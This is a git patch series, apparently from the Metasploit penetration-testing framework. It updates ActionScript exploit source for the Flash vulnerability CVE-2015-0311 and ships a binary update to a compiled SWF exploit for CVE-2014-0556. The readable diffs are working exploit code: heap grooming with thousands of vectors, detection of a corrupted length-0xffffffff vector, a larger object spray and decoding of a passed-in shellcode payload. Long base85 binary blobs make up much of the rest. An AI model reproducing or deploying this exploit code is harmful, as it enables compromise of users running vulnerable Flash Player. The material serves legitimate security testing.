zrgx#Wo=3v%z<<<nSba<-Vc2u%s|$7;h<M|@%CuA#7M>%IfO*L}Gz8G~zWTX4xZ24X
zCzHwnX}|q<A8>`MzDzdd*F9meGe|zI5El5Z15#HMT8s`Ut%HWcUwV#a*qs>0SCXw;
zJ_GdRU5(;z<lMRnv}ndF3BPlp1q&Cmhe(m>sDm<zqkky;vNG#>#xjPkFL8n8Ah)wZ
zcYa6%?zxHDyGX_*rTrY{?32Lx)sMAznG^!D9_E$~>#Q4TIyR)5ulDB@B$X!Nmd%l+
zWpibY%`FhMO)|*u0=8q6-%|og!wPVGpLBdY1#{FK2}GueP{18*EEDPue&Im4u60Mt
zN^02roPU4$r4XB23eMigB14QH(KL4o+xCtZyP9jjpr-KoCG>?S4dhlBvN!pyHx%$M
zw|S@ANn!wgs>jNA?idr4_6=ckOcaPq5@@JAsrFKP5rQ_0i!!~*?rDuEFLNrK^l*A`
z4_$HQdtpw)QAWC*)b;OGAbgS<JjSS5RwB)x`+p|4WLqP6oq+D0ZySR?6xm={KM%V)
z09Bz=5-hvY#MF=8AaD+dCYCsRNBh6+^wT(Z-{s3=r19!7w@d0@R0gH?W`<0|O+J{(
zuf~L9<kB~>)0n&?#5UOr$65v}N|_u=C$;e`wE7FF4Q57kV%qK|xfV^#r<lMu`r83B
pn<U$F3wWBsD)_U860yK|*SF@MvfW5G@;I@XyPwnLfB*b&AIld{;?@8F


From a1538fc3ba1328086ce4a55071b54702694e65c9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:18:01 -0500
Subject: [PATCH 0196/1013] Update AS code

---
 .../source/exploits/CVE-2015-0311/Exploit.as  | 33 +++++++++++++++----
 .../exploits/CVE-2015-0311/Exploiter.as       |  2 +-
 .../source/exploits/CVE-2015-0311/Logger.as   | 18 ++++------
 3 files changed, 34 insertions(+), 19 deletions(-)

diff --git a/external/source/exploits/CVE-2015-0311/Exploit.as b/external/source/exploits/CVE-2015-0311/Exploit.as
index b414320df7..0e63483803 100644
--- a/external/source/exploits/CVE-2015-0311/Exploit.as
+++ b/external/source/exploits/CVE-2015-0311/Exploit.as
@@ -26,15 +26,20 @@ package
         private var b64:Base64Decoder = new Base64Decoder()
         private var payload:String
         private var platform:String
+        private var massage:Vector.<Object> = new Vector.<Object>(10000)
 
         public function Exploit() 
         {
             platform = LoaderInfo(this.root.loaderInfo).parameters.pl
-            b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-            payload = b64.toByteArray().toString();
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)            
+            payload = b64.toByteArray().toString()
 
-            // defrag           
-            for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
+            for (var i:uint = 0; i < massage.length / 2; i++) {
+                massage[i] = new Vector.<uint>(0x3e0) 
+            }
 
             for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
             ba.compress()
@@ -44,8 +49,10 @@ package
             try {
                 ba.uncompress()
             } catch (e:Error) { }
-            uv = new Vector.<uint>(0x3e0)
-            uv[0] = 0 
+
+            for (i = massage.length / 2; i < massage.length; i++) {
+                massage[i] = new Vector.<uint>(0x3e0) 
+            }
 
             var test:uint = li32(0)
             if (test == 0x3e0) {
@@ -54,6 +61,20 @@ package
                 Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
                 return // something failed
             }
+
+            
+            for (i = 0; i < massage.length; i++) {
+                if (massage[i].length == 0x3e0) {
+                    massage[i] = null
+                } else {
+                    Logger.log('[*] Exploit - corrupted vector found at ' + i)
+                    uv = massage[i]
+                    uv[0] = 0 
+                }
+            }
+
+            if (uv.length != 0xffffffff)
+                return
             
             exploiter = new Exploiter(this, platform, payload, uv)
         }
diff --git a/external/source/exploits/CVE-2015-0311/Exploiter.as b/external/source/exploits/CVE-2015-0311/Exploiter.as
index 3203ad77a9..99b41d1f8a 100644
--- a/external/source/exploits/CVE-2015-0311/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0311/Exploiter.as
@@ -23,7 +23,7 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(51200)
+        private var spray:Vector.<Object> = new Vector.<Object>(80000)
 
         public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
         {
diff --git a/external/source/exploits/CVE-2015-0311/Logger.as b/external/source/exploits/CVE-2015-0311/Logger.as
index 2d571c10ee..16c0447973 100644
--- a/external/source/exploits/CVE-2015-0311/Logger.as
+++ b/external/source/exploits/CVE-2015-0311/Logger.as
@@ -7,13 +7,10 @@ package
  
         public static function alert(msg:String):void
         {
-            if (DEBUG == 0)
-                return
-
             var str:String = "";
-            str += msg;
-            
-            trace(str);
+
+            if (DEBUG == 1)
+                str += msg;
             
             if(ExternalInterface.available){
                 ExternalInterface.call("alert", str);
@@ -22,13 +19,10 @@ package
 
         public static function log(msg:String):void
         {
-            if (DEBUG == 0)
-                return
-
             var str:String = "";
-            str += msg;
-            
-            trace(str);
+
+            if (DEBUG == 1)
+                str += msg;
             
             if(ExternalInterface.available){
                 ExternalInterface.call("console.log", str);

From 1742876757f9ce5ea02faae9914616acd3561ead Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:30:39 -0500
Subject: [PATCH 0197/1013] Fix CVE-2014-0556

---
 data/exploits/CVE-2014-0556/msf.swf           | Bin 17750 -> 17720 bytes
 .../source/exploits/CVE-2014-0556/Main.as     |   8 ++++++--
 2 files changed, 6 insertions(+), 2 deletions(-)
 mode change 100755 => 100644 data/exploits/CVE-2014-0556/msf.swf

diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf
old mode 100755
new mode 100644
index 24cfc1a53a7059bf76a4ac9d555d0657792e63a7..f6483bd08741f6e2d275d8e95e7cce77be244500
GIT binary patch
delta 17576
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
